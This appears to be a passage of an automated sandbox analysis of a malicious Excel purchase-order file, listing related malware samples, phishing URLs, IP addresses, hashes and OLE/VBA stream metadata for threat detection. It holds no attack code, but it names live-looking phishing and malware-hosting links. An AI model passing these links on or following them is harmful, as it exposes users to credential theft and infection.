                                  https://mail-donotreply.com/click/65b6d0e2-d9dd-417c-a2b8-70690576459eGet hashmaliciousUnknownBrowse
                                    PRE#U00c7O - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
                                      Medical GmbH Order.xlsGet hashmaliciousUnknownBrowse
                                        Quotation.xlsGet hashmaliciousUnknownBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          s-0005.dual-s-msedge.netProforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 52.123.129.14
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 52.123.129.14
                                          Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 52.123.128.14
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 52.123.129.14
                                          Payment Advice Note from 25.03.2025.msgGet hashmaliciousUnknownBrowse
                                          • 52.123.128.14
                                          Filled-Summons Notice (2).docxGet hashmaliciousHTMLPhisherBrowse
                                          • 52.123.128.14
                                          Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                                          • 52.123.128.14
                                          Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                                          • 52.123.128.14
                                          7e02499c-2bea-a9d9-6a2f-934633fb5e94.emlGet hashmaliciousUnknownBrowse
                                          • 52.123.129.14
                                          https://thetti-my.sharepoint.com/:f:/p/kellieblack/EtssBivICL5BgQEDfbETZP4BZsoHTOyxYMnSj46dgeiAiA?e=0t2fdmGet hashmaliciousHTMLPhisherBrowse
                                          • 52.123.128.14
                                          s-part-0010.t-0009.t-msedge.netEwZAaQu0yXKbde7.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                                          • 13.107.246.38
                                          https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.38
                                          Play Voicemail Transcription. (387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.38
                                          EFT Remittance_(Bobd)CQDM.htmGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                          • 13.107.246.38
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          #Ud83d#Udd0aAudio_Msg Junklessfoods.xhtmlGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.38
                                          Shitstain.exeGet hashmaliciousAnarchyGrabber, AsyncRAT, DBatLoader, Discord Token Stealer, FritzFrog, HawkEye, LokibotBrowse
                                          • 13.107.246.38
                                          http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.comGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.246.38
                                          AliareV0.1.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                          • 13.107.246.38
                                          Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msgGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          bg.microsoft.map.fastly.net9I0bWEd8J8.exeGet hashmaliciousQuasar, XWormBrowse
                                          • 199.232.214.172
                                          Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          Legal_Notice _Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                          • 199.232.214.172
                                          92.255.85.2.exeGet hashmaliciousXWormBrowse
                                          • 199.232.210.172
                                          92.255.85_1.2.ps1Get hashmaliciousXWormBrowse
                                          • 199.232.214.172
                                          cJa3vlUJIWlzkdg.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                          • 199.232.214.172
                                          https://www.canva.com/design/DAGip6DbGGY/U0pN74ofNkqBSFMzXXCnAw/view?utm_content=DAGip6DbGGY&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h777bcb50d3Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                          • 199.232.214.172
                                          file.exeGet hashmaliciousCryptOne, LummaC Stealer, Socks5SystemzBrowse
                                          • 199.232.214.172
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 199.232.210.172
                                          agr.myTransferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          MICROSOFT-CORP-MSN-AS-BLOCKUSProforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 13.107.246.40
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.40
                                          Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 13.107.246.40
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.40
                                          https://energy-innovation-4916.my.salesforce-sites.com/enrGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.42.14
                                          CV RESUME.exeGet hashmaliciousFormBookBrowse
                                          • 20.2.217.253
                                          G3b6ylc4ml.exeGet hashmaliciousVidarBrowse
                                          • 204.79.197.203
                                          N47SyCplyy.exeGet hashmaliciousVidarBrowse
                                          • 204.79.197.203
                                          https://usg02.safelinks.protection.office365.us/?url=https%3A%2F%2Flinks.daily.investingskeeper.com%2Ftrack%3Fuid%3Da3279f8b-b292-438c-a320-cc20f4c87589%26txnid%3D4d4792a7-4bc3-4505-978b-f209450cd9a8%26eid%3D4c4e8593-ace9-4767-8b41-8513ad597438%26mid%3D3362ae60-588c-49ab-b09c-80f1ed79d17b%26bsft_ek%3D2025-03-24T22%253A00%253A12Z%26bsft_mime_type%3Dhtml%26bsft_tv%3D198%26bsft_lx%3D6%26bsft_aaid%3Da1f6e90e-30b3-4e74-bc2b-d28e46c02c74%26a%3Dclick%26redir%3Dhttps%253A%252F%252Fclick.tracking.investingskeeper.com%252F67c9843e0f3b707c79a6b65c%253Femail%253Dlinden.blue%252540ga.com%2526domain%253D035IK%2526type%253DB%2526product%253DAYGT3JS2%2526utm_campaign%253Dik_r-24-3-aygt3js2-yahoo_all%2526utm_source%253Dblueshift%2526utm_medium%253Demail%2526utm_content%253Dik_r-template-2&data=05%7C02%7Clinden.blue%40ga.com%7Cb400af556efd4c2a03ac08dd6b24dfdb%7C05e53887e4b3459587f73ae79f0e723e%7C0%7C0%7C638784528308949376%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=tjEqsrgVwLWIuwClGr3H%2FpLKdZ7vzNH6qyW1ZOS1SBA%3D&reserved=0Get hashmaliciousHTMLPhisherBrowse
                                          • 23.103.208.28
                                          EwZAaQu0yXKbde7.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                                          • 13.107.246.38
                                          SRS-6-Z-7381USPURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 209.46.124.102
                                          PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 209.46.124.102
                                          PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 209.46.124.102
                                          http://paulsss.comGet hashmaliciousUnknownBrowse
                                          • 67.217.228.6
                                          http://paulsss.comGet hashmaliciousUnknownBrowse
                                          • 67.217.228.6
                                          https://cisco.bayada.com/ucmuser/mainGet hashmaliciousUnknownBrowse
                                          • 69.164.117.207
                                          mybestgirlformybestkissesever.vbsGet hashmaliciousRemcosBrowse
                                          • 69.48.201.40
                                          0.vbsGet hashmaliciousRemcosBrowse
                                          • 69.48.201.40
                                          iaminthebestdutyservicewithgreatnessgiven.htaGet hashmaliciousRemcosBrowse
                                          • 69.48.201.40
                                          FA-43-03-2025.jarGet hashmaliciousUnknownBrowse
                                          • 65.38.120.211
                                          EKSENBILISIMTRTransferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          i686.elfGet hashmaliciousUnknownBrowse
                                          • 212.60.30.63
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 147.79.124.110
                                          http://elcharrousa.comGet hashmaliciousUnknownBrowse
                                          • 147.79.123.22
                                          El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                          • 45.143.99.2
                                          0YyNtXEF7a.pdfGet hashmaliciousUnknownBrowse
                                          • 45.143.99.2
                                          C74uZ7KpVc.pdfGet hashmaliciousUnknownBrowse
                                          • 45.143.99.2
                                          4.elfGet hashmaliciousUnknownBrowse
                                          • 45.92.107.109
                                          https://lsscleancom-my.sharepoint.com/:f:/g/personal/kenlo_lssclean_com/EhnR6xetq2dAuMrc9U21jwcBJzCdAGjvCuP0qUViMdaBIQ?e=0YIDjA__;!!Dhw9WWooB8bE!tAdRWoDVFYP2IeTWlIzG7WWn-9rmQ8Bcj1TAwSQFkHEKEKRRtghV6HUuVp2qt0crTG1LxmWitv2uFE_jVwUp17lshg$Get hashmaliciousGabagoolBrowse
                                          • 147.79.74.176

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          6271f898ce5be7dd52b0fc260d0662b3Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 147.79.86.93
                                          a0e9f5d64349fb13191bc781f81f42e1Proforma invoice.xlsGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousCryptOne, LummaC Stealer, Socks5SystemzBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38
                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.38

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):118
                                          Entropy (8bit):3.5700810731231707
                                          Encrypted:false
                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                          MD5:573220372DA4ED487441611079B623CD
                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                          C:\Users\user\AppData\Local\Temp\7F8ABA47.tmp

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):784
                                          Entropy (8bit):2.7137690747287806
                                          Encrypted:false
                                          SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                          MD5:09F73B3902CD3D88E04312787956B654
                                          SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                          SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                          SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                                          C:\Users\user\AppData\Local\Temp\~DFB5DEC57A495EE6D7.TMP

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\Desktop\~$ORDER 517-2025.xla.xlsx

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):165
                                          Entropy (8bit):1.7769794087092887
                                          Encrypted:false
                                          SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                          MD5:37BD8218D560948827D3B948CAFA579C
                                          SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                          SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                          SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                          Malicious:true
                                          Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 26 04:05:24 2025, Security: 1
                                          Entropy (8bit):7.982460847573051
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 47.99%
                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                          File name:ORDER 517-2025.xla.xlsx
                                          File size:1'263'104 bytes
                                          MD5:f9137fe9005de451da58b57301dba5b9
                                          SHA1:5d756a8364f3382703825b71c89247bb2d156f11
                                          SHA256:32df4f4afa4d06c6096d807535d584556cb7dca6234088299106a93a49a8e4ef
                                          SHA512:7b4e958e45047e28649ccd71f1269207b57f6504841aa1fc0a0e6a5ad63b23a34e1264cdebd94513763808acd9957204dd8ae421d9af2772ade2bdb09872a9f1
                                          SSDEEP:24576:vk/BbDqMApAUspxvqbY43WZHzn0M9cWNVDfrsnlCdbPusr:vcRwEpxybY43WF0MtDDTMElW
                                          TLSH:A14523947B80DF77C9A344BC959B8549811AFC807B59CBA3724A735A78313B0866F38F
                                          File Content Preview:........................>...................................v...................................................................................y.......{......................................................................................................

                                          File Icon

                                          Icon Hash:35e58a8c0c8a85b9

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "ORDER 517-2025.xla.xlsx"

                                          Indicators
                                          Has Summary Info:
                                          Application Name:Microsoft Excel
                                          Encrypted Document:True
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:False
                                          Flash Objects Count:0
                                          Contains VBA Macros:True
                                          Summary
                                          Code Page:1252
                                          Author:
                                          Last Saved By:
                                          Create Time:2006-09-16 00:00:00
                                          Last Saved Time:2025-03-26 04:05:24
                                          Creating Application:Microsoft Excel
                                          Security:1
                                          Document Summary
                                          Document Code Page:1252
                                          Thumbnail Scaling Desired:False
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:786432
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                          VBA File Name:Sheet1.cls
                                          Stream Size:977
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y j s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 6a 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                          VBA File Name:Sheet2.cls
                                          Stream Size:977
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y E . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 45 1d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                          VBA File Name:Sheet3.cls
                                          Stream Size:977
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y $ D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 24 44 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                          VBA File Name:ThisWorkbook.cls
                                          Stream Size:985
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y P . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a7 79 d8 50 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:244
                                          Entropy:2.889430592781307
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                          General
                                          Stream Path:\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:200
                                          Entropy:3.2423021151327975
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . Z L . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                          General
                                          Stream Path:MBD00E31B38/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:99
                                          Entropy:3.631242196770981
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
